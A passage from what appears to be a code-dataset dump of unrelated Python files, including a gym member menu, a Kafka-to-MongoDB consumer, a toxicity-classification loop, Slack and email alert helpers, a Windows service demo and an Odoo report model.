\"\\nFriday:{} \\nSaturday:{} \\nSunday:{}\".format(i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7]))\r\n break\r\n elif self.a_bmi <= 29 and float(i[0]) == 29:\r\n print(\"{} Your Workout Regimen\".format(self.name))\r\n print(\"BMI:{} \\nMonday:{} \\nTuesday:{} \\nWednesday:{} \\nThursday:{} \"\r\n \"\\nFriday:{} \\nSaturday:{} \\nSunday:{}\".format(i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7]))\r\n break\r\n elif self.a_bmi >= 30 and float(i[0]) == 30:\r\n print(\"{} Your Workout Regimen\".format(self.name))\r\n print(\"BMI:{} \\nMonday:{} \\nTuesday:{} \\nWednesday:{} \\nThursday:{} \"\r\n \"\\nFriday:{} \\nSaturday:{} \\nSunday:{}\".format(i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7]))\r\n break\r\n else:\r\n print(\"Workout Regimen Not Avalible \\n{}-Sorry Sir/Mam Please Ask a SuperUser to Create a Workout Regimen for your BMI\".format(self.name))\r\n\r\n def member_menu(self):\r\n flag = True\r\n while flag:\r\n try:\r\n self.choice = int(input(\"\\nPress 1 To View My Workout Regimen \\nPress 2 To View a My Profile \\nPress 0 To Exit\"))\r\n if self.choice == 1:\r\n self.my_regimen()\r\n elif self.choice == 2:\r\n self.my_profile()\r\n elif self.choice == 0:\r\n print(\"Thank You....!!!!\")\r\n flag = False\r\n else:\r\n print(\"Not Valid Choice, Try Again....!!!!\")\r\n except:\r\n print(\"Invalid Input------!!!\")\r\n\r\n","sub_path":"member.py","file_name":"member.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"53006552","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport sys\nimport os\nimport logging\nimport json\n\nlogging.basicConfig(level = logging.WARNING,format = '[%(filename)s:%(funcName)s:%(lineno)s]%(message)s')\nlogger = logging.getLogger(\"iSearch\")\n\n\nclass Configer:\n def __init__(self, configPath):\n with open(configPath) as json_data_file:\n self.__config = json.load(json_data_file)\n\n def __del__(self):\n self.__config.close()\n\n def __set_check_func(self):\n self.__checkFunc = {\n \"version\":versionCheck,\n \"titleColor\":ColorCheck,\n \"textColor\":ColorCheck,\n }\n\n def get_config_option(self, key):\n return self.__config[\"key\"]\n\n def set_config_option(self, key, value):\n if self.__checkFunc[key](key, value):\n self.__config[key] = value\n\n def versionCheck(self, key, value):\n if(\"1.0\" == value or \"1.1\" == value):\n return 1\n else:\n logger.error(\"version error\")\n sys.exit(1)\n\n def ColorCheck(self,key, value):\n if value in ColorArr:\n return 1\n else:\n logger.error(key + \" can't be setted \" + value)\n sys.exit(1)\n\n\n\n\n","sub_path":"iSearch/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"161774125","text":"from setuptools import setup, find_packages\nfrom native_tags import __version__\n\ntry:\n readme = open('README.rst').read()\nexcept IOError:\n readme = ''\n\nsetup(name='django-native-tags',\n version=__version__,\n description='Native, Pythonic Templatetags for Django',\n long_description=readme,\n author='Justin Quick',\n author_email='justquick@gmail.com',\n url='http://github.com/justquick/django-native-tags',\n packages=find_packages(exclude=('example_project',)),\n classifiers=['Development Status :: 5 - Production/Stable',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Utilities'],\n )\n","sub_path":"pypi_install_script/django-native-tags-0.5.3.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"517671299","text":"from kafka import KafkaConsumer\nfrom pymongo import MongoClient\nfrom json import loads\n#import datetime\nimport csv\n\nconsumer = KafkaConsumer(\n 'numtest',\n bootstrap_servers=['localhost:9092'],\n auto_offset_reset='latest', #coba latest\n enable_auto_commit=True,\n group_id='my-group',\n value_deserializer=lambda x: loads(x.decode('utf-8')))\n\nclient = MongoClient('localhost:27017')\ncollection = client.numtest.numtest\n\nmsg_to_csv = []\nnum = 1\nfieldnames = ['MinTemp', 'MaxTemp', 'Rainfall', 'Evaporation', 'Sunshine', 'WindGustDir', 'WindGustSpeed', 'WindDir9am', 'WindDir3pm', 'WindSpeed9am', 'WindSpeed3pm', 'Humidity9am', 'Humidity3pm', 'Pressure9am', 'Pressure3pm', 'Cloud9am', 'Cloud3pm', 'Temp9am', 'Temp3pm', 'RainToday', 'RISK_MM']\n\nfor i, message in enumerate(consumer):\n message = message.value\n collection.insert_one(message)\n msg_to_csv.append(message['number'])\n if (i+1) % 47000 == 0:\n if i+1 < 94001:\n csvFile = open(\"model_\" +str(num)+\".csv\" ,'w')\n \n csvWriter = csv.DictWriter(csvFile, fieldnames=fieldnames)\n csvWriter.writeheader()\n for isi in msg_to_csv:\n csvWriter.writerow({'MinTemp': isi[0], 'MaxTemp': isi[1], 'Rainfall': isi[2], 'Evaporation': isi[3], 'Sunshine': isi[4], 'WindGustDir': isi[5], 'WindGustSpeed': isi[6], 'WindDir9am': isi[7], 'WindDir3pm': isi[8], 'WindSpeed9am': isi[9], 'WindSpeed3pm': isi[10], 'Humidity9am': isi[11], 'Humidity3pm': isi[12], 'Pressure9am': isi[13], 'Pressure3pm': isi[14], 'Cloud9am': isi[15], 'Cloud3pm': isi[16], 'Temp9am': isi[17], 'Temp3pm': isi[18], 'RainToday': isi[19], 'RISK_MM': isi[20]})\n\n csvFile.close()\n num += 1\n if(i+1) > 141999:\n # Menulis file lengkap\n csvFile = open(\"model_\" +str(num)+\".csv\" ,'w')\n\n csvWriter = csv.DictWriter(csvFile, fieldnames=fieldnames)\n csvWriter.writeheader()\n for isi in msg_to_csv:\n csvWriter.writerow({'MinTemp': isi[0], 'MaxTemp': isi[1], 'Rainfall': isi[2], 'Evaporation': isi[3], 'Sunshine': isi[4], 'WindGustDir': isi[5], 'WindGustSpeed': isi[6], 'WindDir9am': isi[7], 'WindDir3pm': isi[8], 'WindSpeed9am': isi[9], 'WindSpeed3pm': isi[10], 'Humidity9am': isi[11], 'Humidity3pm': isi[12], 'Pressure9am': isi[13], 'Pressure3pm': isi[14], 'Cloud9am': isi[15], 'Cloud3pm': isi[16], 'Temp9am': isi[17], 'Temp3pm': isi[18], 'RainToday': isi[19], 'RISK_MM': isi[20]}) \n csvFile.close()\n print(str(i+1)+ '--' + str(message['number']) + '\\nPanjang:' + str(len(msg_to_csv)) +'\\n======================')\n##########################################################################################\n\n\n#+ '\\nwaktu: ' + str(datetime.datetime.now().time())\n\n\n\n\n\n\n","sub_path":"Clustering API/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"35595262","text":"#coding:utf-8\n\nimport socket\nfrom struct import pack,unpack\n\n\"\"\"\nauthor:mrtang\ndate:2017.7\nversion:1.0\nemail:mrtang@nudt.edu.cn\n\nThis script defines communication protocol for BCI2000 platform communicates with lower users.\n\"\"\"\n\nclass MRVserver():\n def __init__(self,addr):\n self.ser = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n\n def encode(self,head,op,seq):\n seq.insert(0,len(seq))\n sstr = [pack('b',item) for item in seq]\n return head+op+sstr\n\n def P3Com(self,op,seq):\n if op in ['on','off','res']:\n if op == 'on': op = 'onn'\n buf = self.encode('p300',op,seq)\n self.ser.sendto(buf,addr)\n return 1\n else:\n return 0\n\n def SsvepCom(self,op,seq):\n if op in ['on','off','res']:\n if op == 'on': op = 'onn'\n buf = self.encode('svep',op,seq)\n self.ser.sendto(buf,addr)\n return 1\n else:\n return 0\n\nclass MRVclient():\n def __init__(self,addr):\n self.ser = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n self.ser.bind(addr)\n self.ser.setblocking(0)\n\n self.cmd = {'Obj':'p300','Operate':'on','data':[]}\n\n def update(self):\n try:\n buf = self.ser.recv(512)\n self.cmd['Effective']=1\n head = buf[0:4]\n op = buf[4:7]\n n = unpack('b',buf[7])[0]\n seq = list(unpack('b'*n,buf[7:7+n]))\n if head in ['p300','svep'] and op in ['onn','off','res']:\n self.cmd['Obj']=head\n self.cmd['Operate']=op\n self.cmd['data']=seq\n return 1\n else:\n return 0\n except:\n return 0","sub_path":"已完成/ComProtocol.py","file_name":"ComProtocol.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"576814673","text":"import logging\nimport copy\nimport random \n# from numpy import array\nimport numpy as np\nfrom numpy.random import uniform\nimport gc\n\nfrom trainer.ellington_library import EllingtonLibrary, Track\nfrom trainer.spectrogram import Spectrogram, RangeError\n\nclass TrackIterator: \n track = None\n spect = None\n def __init__(self, track, folder=\"data/smnp/\", start=60, end=180, length=10, samples=10): \n # Set the values, and load the spectrogram\n self.track = track\n self.spect = Spectrogram(track)\n self.folder = folder\n self.spect.load(self.folder)\n\n # Set the config values\n self.start = start \n self.end = end\n self.length = length\n self.samples = samples\n\n def iter(self):\n # Iterate over the range, and emit samples:\n i = 0 \n # Iterate with a while loop, as any iteration might fail\n while i < self.samples: \n s = uniform(self.start, self.end)\n try:\n print(\"Yielding data in range (\" + str(s) + \",\" + str(s+ self.length)+\")\")\n data = self.spect.interval(s)\n if data.shape == (256, 1720):\n i = i + 1\n yield (self.track.bpm, data)\n except RangeError: \n print(\"Random range was invalid - continuing to try again\")\n print(\"Yielded \" + str(self.samples) + \" samples.\")\n\n\nclass LibraryIterator: \n library = None\n \n # Initialise a generator from a library\n def __init__(self, library, folder=\"data/smnp/\", start=60, end=180, length=10, samples=10, iterations=10, batchsize=10): \n # Make a deep copy of the library so that we can shuffle it. \n self.library = copy.deepcopy(library)\n # Cache the config values\n self.folder = folder\n self.start = start \n self.end = end \n self.length = length \n self.samples = samples\n self.iterations = iterations\n self.batchsize = batchsize\n \n def len(self): \n return len(self.library.tracks) * self.samples * self.iterations / self.batchsize\n\n def shuffle(self): \n print(\"Shuffling library\")\n random.shuffle(self.library.tracks)\n \n def iter(self): \n # Go across iterations\n for i in range(0, self.iterations):\n # Start by shuffling the library\n self.shuffle()\n # Iterate over the tracks, and get 20 random samples. \n for t in self.library.tracks:\n print(\"Yielding spectrogram data for \" + t.trackname)\n ti = TrackIterator(t, self.folder, self.start, self.end, self.length, self.samples)\n # Generate random samples from the track, and yield them\n for s in ti.iter(): \n yield s \n del ti\n\n def batch(self): \n # Yield an iterator over batches of samples \n # Iterate over the iterator: \n ix = 0\n inputs = []\n targets = [] \n for s in self.iter(): \n target = float(s[0]) / 400.0\n targets.append(target)\n\n inp = s[1]\n (w, h) = inp.shape\n maxv = np.max(np.abs(inp))\n data = np.reshape(inp, (w, h, 1)) / maxv\n inputs.append(data)\n\n ix = ix + 1\n\n if( ix == self.batchsize): \n inputs_arr = np.stack(inputs, axis=0)\n targets_arr = np.stack(targets, axis=0)\n \n print(\"Yielding an array of \" + str(inputs_arr.shape) + \" samples\")\n\n yield inputs_arr, targets_arr\n\n del inputs \n del targets\n gc.collect()\n inputs = []\n targets = [] \n ix = 0\n \n\n","sub_path":"trainer/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"77634811","text":"# this will classify all issues and comments as toxic\n# in mongodb, starting with the newest\nimport logging\n# logging.basicConfig(filename='toxicity_issues.log',level=logging.INFO)\n# logging.basicConfig(level=logging.INFO)\n\nimport config\n\nVERSION = \"v1\"\nTABLE_PREFIX = \"christian_toxic_\"\n\nlogging.info(\"loading\")\nimport pickle\nimport pymongo\nimport time\n\n\nlogging.info(\"loading model\")\nmodel = pickle.load(open(\"pretrained_model.p\",\"rb\"))\nimport suite\n\n\nlogging.info(\"connecting to database\")\ndef connect_to_database():\n\tmongo_name = config.mongo[\"user\"]\n\tmongo_password = config.mongo[\"passwd\"]\n\n\t# Connect to the Mongo Database\n\tclient = pymongo.MongoClient()\n\tdb = client[config.mongo[\"db\"]]\n\tdb.authenticate(name=mongo_name, password=mongo_password)\n\treturn db\ndb = connect_to_database()\n\nlogging.info(\"starting\")\n\n\n\n\n\ndef get_next_date(table): # updated_at date as string\n\tr = db[TABLE_PREFIX+table].find_one(\n\t\t\tfilter= {\"toxicity.\"+VERSION: {\"$exists\": 0}}, \n\t\t\tsort= [(\"updated_at\", -1)]\n\t\t )\n\treturn r[\"updated_at\"]\n\ndef claim_next(table): # [id, updated_at, time]\n\tstart = time.time()\n\tr = db[TABLE_PREFIX+table].find_one_and_update(\n\t\t\tfilter= {\"toxicity.\"+VERSION: {\"$exists\": 0}}, \n\t\t\tsort= [(\"updated_at\", -1)], \n\t\t\tupdate= {\"$set\":{\"toxicity.\"+VERSION+\".in_progress\": 1 }} \n\t\t )\n\treturn [r[\"_id\"], r[\"updated_at\"], time.time() - start]\n\ndef get_text(table, id): # [text, time]\n\tstart = time.time()\n\ti = db[table].find_one({\"_id\": id}, {\"title\":1, \"body\":1})\n\ttext = \"\"\n\tif \"title\" in i:\n\t\ttext += str(i[\"title\"]) + \": \"\n\tif \"body\" in i:\n\t\ttext += str(i[\"body\"])\n\t# print(text)\n\treturn [text, time.time() - start]\n\n\ndef update_db(table, id, new_data):\n\tstart = time.time()\n\tdb[TABLE_PREFIX+table].update({\"_id\": id},{ \"$set\": new_data })\n\treturn time.time() - start\n\ndef compute_prediction_report(text):\n\tstart = time.time()\n\t# score the issue's text\n\tscore = suite.score_toxicity(text, model)\n\tresult = { \n\t\t\t\"score\": score[0].item(), \n\t\t\t\"orig\" : {\"score\": score[0].item(), \"persp\": score[1], \"polite\": score[2]},\t\t\t\n\t\t\t}\n\n\t# if toxic, look at alternatives\n\tif score[0]==1:\n\t\talt_text = suite.clean_text(text)\n\t\tif len(alt_text)==0:\n\t\t\tprint(\" == found toxic issue, no alternatives\")\n\t\telse:\n\t\t\tprint(\" == found toxic issue, exploring \"+str(len(alt_text))+\" alternatives\")\n\t\t\tisToxic = True\n\t\t\tfor a in alt_text:\n\t\t\t\tif isToxic:\n\t\t\t\t\tscore = suite.score_toxicity(text, model)\n\t\t\t\t\tif score[0] == 0:\n\t\t\t\t\t\tprint(\" === found nontoxic alternative\")\n\t\t\t\t\t\tisToxic=False\n\t\t\t\t\t\tresult[\"score\"]=0\n\t\t\t\t\t\tresult[\"alt\"]={\"text\":a,\"score\": score[0].item(), \"persp\": score[1], \"polite\": score[2]}\n\t\t\tif not isToxic:\n\t\t\t\tresult[\"alt_tried\"]=len(alt_text)\n\treturn [result, time.time() - start]\n\ndef process_one_item(table):\n\t# grab the most recent issue to process\n\t[issue_id, d, t1] = claim_next(table)\n\tprint(table, issue_id, d)\n\n\t# get the text\n\t[text, t2] = get_text(table, issue_id)\n\n\t# score the text\n\t[score_report, t3] = compute_prediction_report(text)\n\tresult = {\"toxicity.\"+VERSION: score_report}\n\n\t# write results to db\n\tt4=update_db(table,issue_id,result)\n\t# print(\"db time\", t1, t2, t4, \"scoring time\", t3)\n\ndef process_100_items(table):\n\tfor x in range(0, 99):\n\t\tprocess_one_item(table)\n\nwhile True:\n\tnext_i = get_next_date(\"issues\")\n\tnext_ic = get_next_date(\"issue_comments\")\n\tif (next_i > next_ic):\n\t\tprocess_100_items(\"issues\")\n\telse:\n\t\tprocess_100_items(\"issue_comments\")\n\t","sub_path":"src/classify_comments.py","file_name":"classify_comments.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"597764612","text":"import json\n\nimport requests\nimport slack\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import *\n\n\ndef send_slack_alert(wekbook_url, web_api_token, dest_channel, query, job_id, user_email, cost, gigabytes_billed,\n customize_details):\n try:\n message_blocks = [\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": \"The following query has processed large amount of data:\"\n }\n },\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": \"Query Syntax ```\" + str(query) + \"```\"\n }\n },\n {\n \"type\": \"section\",\n \"fields\": [\n {\n \"type\": \"mrkdwn\",\n \"text\": \"Job ID *\" + str(job_id) + \"*\"\n },\n {\n \"type\": \"mrkdwn\",\n \"text\": \"Query User *\" + str(user_email) + \"*\"\n },\n {\n \"type\": \"mrkdwn\",\n \"text\": \"Gigabytes Billed *\" + str(truncate(gigabytes_billed, 2)) + \"*\"\n },\n {\n \"type\": \"mrkdwn\",\n \"text\": \"Query Cost *$\" + str(truncate(cost, 2)) + \"*\"\n }\n ]\n }\n ]\n\n if wekbook_url:\n send_slack_alert_webhook(wekbook_url, dest_channel, message_blocks)\n\n if web_api_token:\n send_slack_alert_web_api(web_api_token, dest_channel, message_blocks, user_email)\n except Exception as e:\n print(\"Failed to send slack alert. \\n\")\n print(e)\n\n\ndef send_slack_alert_webhook(wekbook_url, dest_channel, blocks):\n print(\"sending slack webhook alert\")\n try:\n data = {\"blocks\": blocks, \"channel\": dest_channel}\n\n requests.post(wekbook_url, data=json.dumps(\n data), headers={'Content-Type': 'application/json'})\n except Exception as e:\n print(\"Failed to send slack alert. \\n\")\n print(e)\n\n\ndef send_slack_alert_web_api(web_api_token, dest_channel, message_blocks, user_email):\n print(\"sending slack web api alert\")\n client = slack.WebClient(web_api_token)\n try:\n\n client.chat_postMessage(channel=dest_channel, blocks=message_blocks)\n\n except Exception as e:\n print(\"Failed to send slack alert to channel: \" + dest_channel)\n print(e)\n\n try:\n\n slack_user = client.users_lookupByEmail(email=user_email)\n if slack_user:\n user_id = slack_user.data.get(\"user\").get(\"id\")\n client.chat_postMessage(channel=user_id, blocks=message_blocks)\n\n except Exception as e:\n print(\"Failed to send slack alert to user: \" + user_email)\n print(e)\n\n\ndef send_email_alert(sendgrid_api_key, sender, query, job_id, user_email, cc_list, total_cost, giga_bytes_billed,\n details):\n email_body = \"Hey,
    The following query has processed large amount of data:\" \\\n + \"
    \" + query + \"\" \\\n + \"
    Job ID \" + job_id + \" Query User \" + user_email + \"\" \\\n + \"
    \" + \"Gigabytes Billed \" + str(truncate(giga_bytes_billed, 2)) \\\n + \" Query Cost $\" + str(truncate(total_cost, 2)) + \"\"\n\n message = Mail(\n from_email=sender,\n to_emails=user_email,\n subject='BigQuery job crossed threshold',\n html_content='' + email_body + '')\n for cc_email in cc_list:\n message.personalizations[0].add_cc(Email(cc_email))\n try:\n sg = SendGridAPIClient(sendgrid_api_key)\n sg.send(message)\n except Exception as e:\n print(\"Failed to send email alert. \\n\")\n print(e)\n\n\ndef truncate(f, n):\n s = '{}'.format(f)\n if 'e' in s or 'E' in s:\n return '{0:.{1}f}'.format(f, n)\n i, p, d = s.partition('.')\n return '.'.join([i, (d + '0' * n)[:n]])\n","sub_path":"alert_channels.py","file_name":"alert_channels.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"482148889","text":"'''\nCreated on Mar 30, 2018\n\n@author: abelit\n'''\n\ndef runServiceBaseNT():\n # Service running backgound based windows \n try: \n import win32serviceutil\n import win32service\n import win32event\n import servicemanager\n import socket\n import time\n import sys\n except ImportError as e:\n print(e)\n\n\n class DBReportService(win32serviceutil.ServiceFramework):\n _svc_name_ = 'DBReportService'\n _svc_display_name_ = 'DBReportService'\n \n def __init__(self, args):\n win32serviceutil.ServiceFramework.__init__(self, args)\n self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)\n \n socket.setdefaulttimeout(60)\n self.isAlive = True\n \n def SvcStop(self):\n self.isAlive = False\n self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n win32event.SetEvent(self.hWaitStop)\n \n def SvcDoRun(self):\n self.isAlive = True\n servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE, \n servicemanager.PYS_SERVICE_STARTED, (self._svc_name_, ''))\n while self.isAlive: \n wfile()\n time.sleep(3)\n\n win32event.WaitForSingleObject(self.hWaitStop, win32event.INFINITE)\n \n def main(self):\n #i = 0\n while self.isAlive: \n wfile()\n time.sleep(3)\n\n\n return DBReportService\n\n\ndef wfile():\n f = open('C:\\\\Users\\\\Abelit\\\\Desktop\\\\demo.txt','a')\n\n f.write('hello abelit \\n')\n\n f.close()\n\n\nif __name__ == '__main__':\n print(runServiceBaseNT())","sub_path":"tests/testmodule.py","file_name":"testmodule.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"474408349","text":"import random\n\nhigh = 10\nanswer = random.randint(1, high)\nguss_loop = True\nwhile(guss_loop):\n guss = int(input(\"Please inter your guss: \"))\n if guss > answer:\n print(\"Please guess lower \")\n elif guss == 0:\n print(\"You are quiting \")\n break\n elif guss == answer:\n print(\"Congratulation You guss right number {} \".format(answer))\n guss_loop = False\n else:\n print(\"Please guess Higher\")\n\n\n\n","sub_path":"program flow control/while/whileChalenge.py","file_name":"whileChalenge.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"303784875","text":"import read_files\n\n\nclass Database():\n # 原始数据库类,用于存储所有的原始数据\n\n\n\n def __init__(self):\n # 构造函数,用于初始化数据库对象,将所有原始数据存储在data成员变量中\n self.data = read_files.read_files(\"../../../inputdata\")\n\n def extract_columns(self, sheet_name, fields):\n # 根据开发人员需求,可任意抽取某个sheet中的某些列数据,抽取的数据中不包含标题行\n ranges = ('传输告警', '动环告警', '无线告警', '核心网告警', 'OTN-板卡(CRD)', 'OTN-激光器(OPM)',\n 'PTN-板卡(CRD)', 'PTN-激光器(OPM)', '核心网(MSS)', '核心网(MGW)', '核心网(HSS)',\n '核心网(SBC)', '无线(BSC)', '无线(4G小区)', 'sheet0', 'IP承载网-传输信息-IP中继',\n 'LTE核心网-链路', '传输电路的配置查询结果', '动力专业-动环专业内输出分路', '动力专业-跨专业输出分路',\n '无线专业-无线端口', '核心网-中继模板', 'UPS系统的配置查询结果', 'UPS设备的配置查询结果',\n '专用空调的配置查询结果', '交流配电柜的配置查询结果', '低压配电柜的配置查询结果',\n '其他设备的配置查询结果', '动环监控设备的配置查询结果', '发电机组的配置查询结果',\n '发电系统的配置查询结果', '变压器或调压器的配置查询结果', '变换设备的配置查询结果-湘潭无数据',\n '开关电源的配置查询结果', '开关电源系统的配置查询结果', '普通空调的配置查询结果',\n '直流配电柜的配置查询结果', '蓄电池组的配置查询结果', '高压配电柜的配置查询结果',\n '高压配电系统的配置查询结果', 'BBU的配置查询结果', 'BSC的配置查询结果', 'BTS的配置查询结果',\n 'E-NODEB的配置查询结果', 'E_UTRANCELL的配置查询结果', 'RNC的配置查询结果', 'RRU的配置查询结果',\n '天线的配置查询结果', '室内分布系统的配置查询结果', '小区的配置查询结果', '直放站的配置查询结果',\n '铁塔的配置查询结果', 'BGCF', 'CG', 'CTXAS公共资源', 'DNS&ENUM', 'ICSCF', 'IM-MGW', 'IMS HSS',\n 'ISBG', 'MGCF', 'MMTAS', 'PCSCF', 'SBC集团模板', 'SCSCF', 'HSS_BE', 'HSS_FE', 'HSS分布式', 'AP',\n 'ATCF', 'ATGW', 'MRFC', 'MRFP', 'PSBC', 'SCC AS', 'VOLTE AS', 'VOLTE TAS', 'LTE_CE模板',\n 'LTE_CG导入模板', 'LTE_DNS导入模板', 'DRA集团模板', 'LTE_FW导入模板', 'LTE_MME', 'LTE_PCRF-BE',\n 'LTE_PCRF', 'LTE_SAE_GW', 'LTE_SW导入模板', '业务处理单元', '信令处理单元', '智能网网络设备',\n '网元通用', 'MGW网元集团模板', 'SS网元集团模板', 'STP网元集团模板', '彩信中心(基础信息)',\n '彩信中心(系统信息)', '短信中心(基础信息)', '短信中心(系统信息)', '短信网关(基础信息)',\n '短信网关(系统信息)')\n\n if sheet_name not in ranges:\n raise IndexError(\"not found tablename: \" + tablename)\n return None\n\n col_names = list(self.data[sheet_name].columns)\n for field in fields:\n if field not in col_names:\n raise Exception(\"数据表: \" + sheetname + \" 中,不包含要提取的列 \"+field)\n return None\n return self.data[sheet_name].loc[:, fields]\n\n\n\nif __name__ == '__main__':\n result1 = Database()\n print(result1.extract_columns(sheetname=\"动环告警\", fields=(\"原始告警流水号\", \"厂家告警号\")))\n","sub_path":"com/chinamobile/cq/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"510739525","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api\nimport base64\nfrom openerp.osv import osv\n\nfrom reportlab.lib.enums import TA_JUSTIFY\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.units import inch\nfrom reportlab.lib.colors import magenta, red , black, white, blue, gray, Color, HexColor, PCMYKColor, PCMYKColorSep\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.lib.pagesizes import letter, A4, legal\nfrom reportlab.platypus import SimpleDocTemplate, Table, TableStyle\nfrom reportlab.lib import colors\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.platypus import Paragraph, Table\nfrom reportlab.lib.units import cm,mm\nfrom reportlab.lib.utils import simpleSplit\nfrom cgi import escape\n\nimport decimal\n\n\ndef dig_5(n):\n\treturn (\"%5d\" % n).replace(' ','0')\n\n\nclass consolidado_rm_resultado_mexicano_line(models.Model):\n\t_name = 'consolidado.rm.resultado.mexicano.line'\n\n\torden = fields.Float('Orden',required=True)\n\tconcepto = fields.Char('Concepto')\n\ttipo_cuenta = fields.Selection([('1','Ingreso'),('2','Costo o Gasto'),('3','Calculado'),('4','Ingresado'),('5','Texto Fijo')],'Tipo Cuenta')\n\t#tipo_cuenta = fields.Selection([('1','Disponible'),('2','Exigible'),('3','Realizable'),('4','Activo Fijo'),('5','Otros Activos FIjos'),('6','Activo Diferido'),('7','Activos Arrendamiento Financiero'),('8','Pasivo Circulante'),('9','Pasivo Fijo'),('10','Capital Contable'),('11','Deuda Intrinseca por Arredamiento')],'Tipo Cuenta',required=True)\n\tformula = fields.Char('Formula')\n\ttotal = fields.Char('Linea de Total')\n\tresaltado = fields.Boolean('Resaltado')\n\tbordes = fields.Boolean('Bordes')\n\n\t#monto_mes = fields.Float('Saldo',digits=(12,2))\n\tenero = fields.Float('Enero',digits=(12,2))\n\tfebrero = fields.Float('Febrero',digits=(12,2))\n\tmarzo = fields.Float('Marzo',digits=(12,2))\n\tabril = fields.Float('Abril',digits=(12,2))\n\tmayo = fields.Float('Mayo',digits=(12,2))\n\tjunio = fields.Float('Junio',digits=(12,2))\n\tjulio = fields.Float('Julio',digits=(12,2))\n\tagosto = fields.Float('Agosto',digits=(12,2))\n\tseptiembre = fields.Float('Septiembre',digits=(12,2))\n\toctubre = fields.Float('Octubre',digits=(12,2))\n\tnoviembre = fields.Float('Noviembre',digits=(12,2))\n\tdiciembre = fields.Float('Diciembre',digits=(12,2))\n\n\tporc_enero = fields.Float('Porcentaje Enero',digits=(12,2))\n\tporc_febrero = fields.Float('Porcentaje Febrero',digits=(12,2))\n\tporc_marzo = fields.Float('Porcentaje Marzo',digits=(12,2))\n\tporc_abril = fields.Float('Porcentaje Abril',digits=(12,2))\n\tporc_mayo = fields.Float('Porcentaje Mayo',digits=(12,2))\n\tporc_junio = fields.Float('Porcentaje Junio',digits=(12,2))\n\tporc_julio = fields.Float('Porcentaje Julio',digits=(12,2))\n\tporc_agosto = fields.Float('Porcentaje Agosto',digits=(12,2))\n\tporc_septiembre = fields.Float('Porcentaje Septiembre',digits=(12,2))\n\tporc_octubre = fields.Float('Porcentaje Octubre',digits=(12,2))\n\tporc_noviembre = fields.Float('Porcentaje Noviembre',digits=(12,2))\n\tporc_diciembre = fields.Float('Porcentaje Diciembre',digits=(12,2))\n\n\t@api.one\n\tdef get_acum_anio(self):\n\t\tself.acum_anio = self.enero + self.febrero + self.marzo + self.abril + self.mayo + self.junio + self.julio + self.agosto + self.septiembre + self.octubre + self.noviembre + self.diciembre\n\n\n\t@api.one\n\tdef get_acum_porc(self):\n\t\ttmp = ((self.enero*100.0) / self.porc_enero) if self.porc_enero != 0 else 0 \n\t\ttmp += ((self.febrero*100.0) / self.porc_febrero) if self.porc_febrero != 0 else 0\n\t\ttmp += ((self.marzo*100.0) / self.porc_marzo) if self.porc_marzo != 0 else 0\n\t\ttmp += ((self.abril*100.0) / self.porc_abril) if self.porc_abril != 0 else 0\n\t\ttmp += ((self.mayo*100.0) / self.porc_mayo) if self.porc_mayo != 0 else 0\n\t\ttmp += ((self.junio*100.0) / self.porc_junio) if self.porc_junio != 0 else 0\n\t\ttmp += ((self.julio*100.0) / self.porc_julio) if self.porc_julio != 0 else 0\n\t\ttmp += ((self.agosto*100.0) / self.porc_agosto) if self.porc_agosto != 0 else 0\n\t\ttmp += ((self.septiembre*100.0) / self.porc_septiembre) if self.porc_septiembre != 0 else 0\n\t\ttmp += ((self.octubre*100.0) / self.porc_octubre) if self.porc_octubre != 0 else 0\n\t\ttmp += ((self.noviembre*100.0) / self.porc_noviembre) if self.porc_noviembre != 0 else 0\n\t\ttmp += ((self.diciembre*100.0) / self.porc_diciembre) if self.porc_diciembre != 0 else 0\n\n\t\tself.acum_porc = ( 